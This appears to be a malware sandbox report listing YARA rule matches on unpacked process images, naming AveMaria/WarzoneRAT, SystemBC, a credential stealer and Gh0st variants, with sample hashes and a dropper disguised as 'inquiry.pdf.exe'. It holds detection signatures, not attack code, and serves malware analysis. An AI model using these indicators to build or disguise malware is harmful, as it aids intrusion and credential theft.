Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.ea71c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea71c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.ea71c8.10.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea71c8.10.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.e95278.8.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.e95278.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.ea6d50.9.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.9.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.ea6d50.6.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.6.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
